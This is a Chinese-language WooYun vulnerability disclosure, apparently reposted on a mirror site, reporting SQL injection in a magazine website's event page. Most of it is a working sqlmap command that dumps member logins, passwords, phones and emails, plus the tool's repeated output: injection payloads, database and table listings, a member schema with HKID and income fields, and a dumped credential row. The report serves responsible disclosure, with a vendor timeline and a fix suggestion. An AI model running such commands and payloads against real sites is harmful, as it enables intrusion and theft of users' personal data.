乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-04: 细节已通知厂商并且等待厂商处理中 2015-11-07: 厂商已经确认,细节仅向厂商公开 2015-11-17: 细节向核心白帽子及相关领域专家公开 2015-11-27: 细节向普通白帽子公开 2015-12-07: 细节向实习白帽子公开 2015-12-22: 细节向公众公开
U Magazine 創刊 4 年多,口碑載道,繼 2007 獲頒 APMA 亞洲最佳新雜誌獎 (左)後,更於2008 年 4 月榮獲第 7 屆亞洲媒體獎 (右) ( 7th Asia Media Awards 2008 ) 2 項金獎殊榮,包括最佳封面設計獎金獎 (雜誌組) 及最佳專題報導獎金獎 (雜誌組) ,今次是 U Magazine 首次參加這個比賽,最終憑藉第 100 期的 "100% Tokyo" 的獨特設,撃敗來自新加坡的 I Weekly (銀獎) 及 TIME (銅獎)。另憑探討公共空間的公共建築大變身及六個起樓的青年的 "香港建築系列"奪最佳專題報導獎金獎。是唯一一本能連奪 2 項金獎的入圍香港雜誌。2009 年 U Magazine 再接再厲,再次榮獲另一亞洲性的重要獎項,Asia Travel & Tourism Creative Awards "最佳旅遊攝影獎" -風景組銅獎,是次得獎對 U Magazine 來說別見意義。
地址:http://**.**.**.**/event_result.php?event_pkey=142
python sqlmap.py -u "http://**.**.**.**/event_result.php?event_pkey=142" -p event_pkey --technique=BEU --random-agent --batch -D umagazine_v3 -T tbl_member -C login,password,name,mobile_tel,email --dump
---Parameter: event_pkey (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: event_pkey=142' AND 8553=8553 AND 'qUpz'='qUpz Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: event_pkey=142' AND (SELECT 1368 FROM(SELECT COUNT(*),CONCAT(0x716b707a71,(SELECT (ELT(1368=1368,1))),0x717a6b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'pbZT'='pbZT Type: UNION query Title: MySQL UNION query (NULL) - 23 columns Payload: event_pkey=-1551' UNION ALL SELECT NULL,NULL,CONCAT(0x716b707a71,0x46714e774e63745a547852424e4757734563626a7959536c4e4b5a555469656154755a4279765143,0x717a6b7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#---web server operating system: Linux CentOS 6.5web application technology: PHP 5.3.3, Apache 2.2.15back-end DBMS: MySQL 5.0available databases [3]:[*] information_schema[*] test[*] umagazine_v3sqlmap resumed the following injection point(s) from stored session:---Parameter: event_pkey (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: event_pkey=142' AND 8553=8553 AND 'qUpz'='qUpz Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: event_pkey=142' AND (SELECT 1368 FROM(SELECT COUNT(*),CONCAT(0x716b707a71,(SELECT (ELT(1368=1368,1))),0x717a6b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'pbZT'='pbZT Type: UNION query Title: MySQL UNION query (NULL) - 23 columns Payload: event_pkey=-1551' UNION ALL SELECT NULL,NULL,CONCAT(0x716b707a71,0x46714e774e63745a547852424e4757734563626a7959536c4e4b5a555469656154755a4279765143,0x717a6b7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#---web server operating system: Linux CentOS 6.5web application technology: PHP 5.3.3, Apache 2.2.15back-end DBMS: MySQL 5.0Database: umagazine_v3[107 tables]+-----------------------------------+| tbl_ad || tbl_admin || tbl_badwords || tbl_badwords_bak || tbl_banner1 || tbl_banner1_item || tbl_banner2 || tbl_banner2_item || tbl_banner3 || tbl_banner3_item || tbl_banner4 || tbl_banner4_item || tbl_banner5 || tbl_banner5_item || tbl_cms_doc || tbl_cms_photo || tbl_contact || tbl_content || tbl_contents_book || tbl_contents_book_bak2 || tbl_contents_book_bak3 || tbl_contents_book_desc_photo || tbl_contents_book_desc_photo_bak || tbl_contents_book_desc_photo_bak2 || tbl_contents_book_desc_photo_bak3 || tbl_contents_book_pages || tbl_contents_book_pages_bak || tbl_contents_book_pages_bak2 || tbl_contents_book_pages_bak3 || tbl_contents_section || tbl_doclist || tbl_doclist_item || tbl_event || tbl_event_option || tbl_event_question || tbl_event_result || tbl_eventalbum || tbl_eventcontent || tbl_eventphoto || tbl_experts || tbl_forum || tbl_forum_badword || tbl_forum_group || tbl_forum_reply || tbl_forum_setting || tbl_forum_topic || tbl_forum_user_upload_photo || tbl_game || tbl_gameresult || tbl_gift || tbl_gift_option || tbl_gift_result || tbl_gift_winner || tbl_home || tbl_left_menu || tbl_link || tbl_member || tbl_member_20071026 || tbl_member_20080709 || tbl_member_bak || tbl_member_bookmark || tbl_member_forum || tbl_member_forum_20080709 || tbl_member_old || tbl_page || tbl_page_content || tbl_photo || tbl_photo_album_photo || tbl_photo_album_photo_cat || tbl_photo_poll || tbl_photo_poll_old || tbl_photo_poll_photo || tbl_photo_poll_photo_old || tbl_photo_rte || tbl_photo_sharing || tbl_photo_sharing_country || tbl_photo_sharing_country_group || tbl_photo_sharing_index || tbl_photo_sharing_setup || tbl_poll || tbl_pollingcontent || tbl_qna || tbl_story || tbl_story_country || tbl_story_country_group || tbl_story_setup || tbl_test || tbl_tips || tbl_tipscontent || tbl_uclub_promote || tbl_video || tbl_video_album_video || tbl_video_album_video_cat || tbl_video_country || tbl_video_country_group || tbl_video_item || tbl_vote || tbl_vote_ite || tbl_vote_main || tbl_vote_option || tbl_vote_photo || tbl_vote_photo_old || tbl_vote_topic || tbl_wallpaper || tbl_wallpaper_country || tbl_wallpaper_country_group || tbl_wallpaper_setup |+-----------------------------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: event_pkey (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: event_pkey=142' AND 8553=8553 AND 'qUpz'='qUpz Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: event_pkey=142' AND (SELECT 1368 FROM(SELECT COUNT(*),CONCAT(0x716b707a71,(SELECT (ELT(1368=1368,1))),0x717a6b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'pbZT'='pbZT Type: UNION query Title: MySQL UNION query (NULL) - 23 columns Payload: event_pkey=-1551' UNION ALL SELECT NULL,NULL,CONCAT(0x716b707a71,0x46714e774e63745a547852424e4757734563626a7959536c4e4b5a555469656154755a4279765143,0x717a6b7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#---web server operating system: Linux CentOS 6.5web application technology: PHP 5.3.3, Apache 2.2.15back-end DBMS: MySQL 5.0Database: umagazine_v3Table: tbl_member[56 columns]+-----------------+--------------+| Column | Type |+-----------------+--------------+| version | int(11) || active | tinyint(1) || addr_area | varchar(50) || addr_block | varchar(50) || addr_building | varchar(100) || addr_district | varchar(100) || addr_estate | varchar(100) || addr_floor | varchar(50) || addr_room | varchar(50) || addr_street | varchar(100) || age | varchar(50) || chi_name | varchar(50) || dob | datetime || dob_d | int(11) || dob_m | int(11) || education | varchar(50) || email | varchar(50) || expense1 | varchar(50) || expense2 | varchar(50) || expense3 | varchar(50) || expense4 | varchar(50) || first_name | varchar(50) || hkid | varchar(50) || home_tel | varchar(50) || income_family | varchar(50) || income_personal | varchar(50) || internal_remark | text || is_email_list | tinyint(1) || is_email_list02 | tinyint(1) || is_wc | tinyint(1) || last_name | varchar(100) || login | varchar(50) || mobile_tel | varchar(50) || name | varchar(50) || occupation | varchar(50) || password | varchar(50) || pkey | int(11) || q1 | text || q2 | text || q3 | text || q4 | text || q5a | text || q5b | text || q5c | text || q5d | text || q5e | text || q5f | text || q5g | text || q5h | text || q6 | text || q7 | text || reg_date | datetime || sex | varchar(200) || tel | varchar(50) || title | varchar(10) || total_login | int(11) |+-----------------+--------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: event_pkey (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: event_pkey=142' AND 8553=8553 AND 'qUpz'='qUpz Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: event_pkey=142' AND (SELECT 1368 FROM(SELECT COUNT(*),CONCAT(0x716b707a71,(SELECT (ELT(1368=1368,1))),0x717a6b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'pbZT'='pbZT Type: UNION query Title: MySQL UNION query (NULL) - 23 columns Payload: event_pkey=-1551' UNION ALL SELECT NULL,NULL,CONCAT(0x716b707a71,0x46714e774e63745a547852424e4757734563626a7959536c4e4b5a555469656154755a4279765143,0x717a6b7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#---web server operating system: Linux CentOS 6.5web application technology: PHP 5.3.3, Apache 2.2.15back-end DBMS: MySQL 5.0Database: umagazine_v3Table: tbl_member[1 entry]+---------+----------+---------+------------+---------+| login | password | name | mobile_tel | email |+---------+----------+---------+------------+---------+| richard | 1234 | <blank> | <blank> | <blank> |+---------+----------+---------+------------+---------+
上WAF
危害等级:高
漏洞Rank:14
确认时间:2015-11-07 13:09
已將事件通知有關機構
暂无